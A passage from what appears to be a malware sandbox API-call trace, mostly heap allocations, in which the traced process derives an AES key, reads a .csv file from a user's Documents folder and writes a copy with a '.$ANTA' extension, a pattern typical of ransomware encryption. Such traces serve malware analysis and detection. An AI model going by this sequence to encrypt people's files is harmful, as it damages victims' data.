(HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0079.730] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0079.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0079.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0079.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0079.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0079.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0079.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b60 [0079.730] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb030 [0079.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0079.731] PeekMessageW (in: lpMsg=0x144e4ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4ec) returned 0 [0079.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0079.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0079.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0079.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0079.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0079.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0079.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0079.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0079.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0079.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0079.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0079.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0079.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0079.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0079.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0079.731] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0079.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cadf0 [0079.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0079.731] PeekMessageW (in: lpMsg=0x144e4ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4ec) returned 0 [0079.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0079.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0079.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0079.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0079.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0079.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0079.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0079.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0079.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0079.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0079.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0079.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0079.731] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0079.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0079.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0079.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0079.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0079.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0079.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0079.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0079.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0079.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0079.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0079.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0079.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0079.732] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0079.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0079.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0079.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0079.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0079.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0079.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0079.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0079.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0079.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0079.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0079.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0079.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0079.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0079.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0079.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0079.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0079.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0079.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0079.732] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0079.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0079.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0079.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0079.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0079.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0079.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0079.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0079.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0079.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0079.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0079.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0079.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0079.733] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0079.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xf) returned 0x43caee0 [0079.733] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43caee0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0079.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0079.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0079.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0079.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0079.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0079.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0079.733] CryptDeriveKey (in: hProv=0x41a49d0, Algid=0x6610, hBaseData=0x41ac700, dwFlags=0x1, phKey=0x144e520 | out: phKey=0x144e520*=0x41ac740) returned 1 [0079.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0079.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea508 [0079.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797128 [0079.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0079.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0079.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0079.733] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0079.733] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.733] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.734] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0079.734] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796fc8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0079.734] CryptDestroyHash (hHash=0x41ac700) returned 1 [0079.739] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\sAJ5q4Jpz7.csv" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\saj5q4jpz7.csv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0079.739] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.739] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ec58 | out: lpNewFilePointer=0x0) returned 1 [0079.739] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg")) returned 0x10 [0079.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369fd8 | out: hHeap=0x1780000) returned 1 [0079.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0079.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d98 | out: hHeap=0x1780000) returned 1 [0079.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0079.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0079.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0079.739] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\sAJ5q4Jpz7.csv.$ANTA" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\saj5q4jpz7.csv.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0079.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0079.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0079.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0079.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0079.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0079.740] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0079.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0079.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0079.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0079.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0079.740] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0079.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0079.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0079.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0079.743] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eca8 | out: lpNewFilePointer=0x0) returned 1 [0079.743] ReadFile (in: hFile=0x298, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ecd0*=0x10000, lpOverlapped=0x0) returned 1 [0079.744] ReadFile (in: hFile=0x298, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ecd0*=0x2013, lpOverlapped=0x0) returned 1 [0079.745] ReadFile (in: hFile=0x298, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ecd0*=0x0, lpOverlapped=0x0) returned 1 [0079.745] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0079.745] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0079.745] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0079.745] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e0e020 | out: hHeap=0x1780000) returned 1 [0079.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0079.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0079.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0079.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0079.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0079.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0079.747] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0079.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0079.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0079.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0079.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0079.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0079.748] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0079.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0079.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0079.748] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0079.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391dc8 | out: hHeap=0x1780000) returned 1 [0079.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0079.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0079.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0079.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0079.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0079.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0079.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0079.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0079.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0079.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0079.748] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0079.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0079.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0079.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0079.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0079.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0079.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0079.749] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0079.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0079.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0079.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0079.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0079.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0079.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0079.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0079.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0079.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0079.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0079.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0079.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0079.749] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0079.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0079.749] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391dc8 | out: hHeap=0x1780000) returned 1 [0079.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0079.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0079.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0079.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0079.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0079.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0079.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0079.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0079.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0079.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0079.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0079.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0079.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0079.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0079.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0079.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0079.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0079.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0079.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0079.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2788 | out: hHeap=0x1780000) returned 1 [0079.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0079.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0079.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0079.750] HeapFree (in: 